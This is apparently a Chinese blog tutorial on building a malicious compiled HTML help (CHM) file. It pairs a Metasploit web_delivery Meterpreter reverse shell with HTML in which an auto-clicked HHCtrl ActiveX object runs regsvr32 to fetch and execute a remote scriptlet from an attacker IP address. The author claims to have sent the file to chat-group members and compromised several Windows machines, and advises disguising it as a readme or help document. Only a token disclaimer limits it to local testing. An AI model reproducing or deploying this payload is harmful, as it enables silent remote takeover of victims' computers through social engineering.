如何制作恶意的readme.chm文件

你能想象微软帮助文档可能也是恶意文件吗?

CHM简介:

CHM 文件格式是微软于 1998 年推出的基于 HTML 文件特性的帮助文件系统,以替代早先的 WinHelp 帮助系统。它在 Windows 98 中把 CHM 类型文件称作“编译的 HTML 帮助文件”(Compiled HTML Help file)。 [1]被 IE 浏览器支持的JavaScript, VBScript, ActiveX, Java Applet, Flash, 常见图形文件(GIF、JPEG、PNG)、音频视频文件(MID、WAV、AVI)等等,CHM同样支持,并可以通过 URL 与 Internet 联系在一起。CHM 文件因为使用方便,形式多样,也被采用作为电子书的格式。

环境装备:

  • 1. kali linux
  • 2. easychm电子书制作工具(文末有下载链接)

步骤1: 使用msf生成有效载荷

启动msf ,使用:

use exploit/multi/script/web_delivery

set target 3

set payload windows/x64/meterpreter/reverse_tcp

设置选项配置完成后,exploit开启监听

步骤2: 制作chm后门

下载easychm并解压运行easychm


在桌面新建一个文件夹,文件夹中新建一个index.html,easychm新建并选择该文件夹

复制以下代码到index.html中

<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>
使用说明
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
 <PARAM name="Button" value="Bitmap::shortcut">
 <PARAM name="Item1" value=',regsvr32, /s /n /u /i:http://172.16.6.134:8080/aCVPU3FQO.sct scrobj.dll'>
 <PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body></html>


复制msf生成的regsvr32脚本 ,将如下内容进行替换,并在regsvr32后门加上一个,(逗号)

编译,生成chm文件

步骤3:获取meterpreter会话

双击运行chm,无任何异常,弹窗等,很自然的拿到windows会话

是否被杀

利用场景

经过测试,发送给群成员,已拿到多台windows权限,为了增加实验成功的可能性,可修改为帮助文档,readme等…

(仅供本地测试,请勿非法传播)

easychm下载
链接:https://pan.baidu.com/s/1G96bM6D-qZrI1WhdCGESsw 密码:qkxt

You may also like...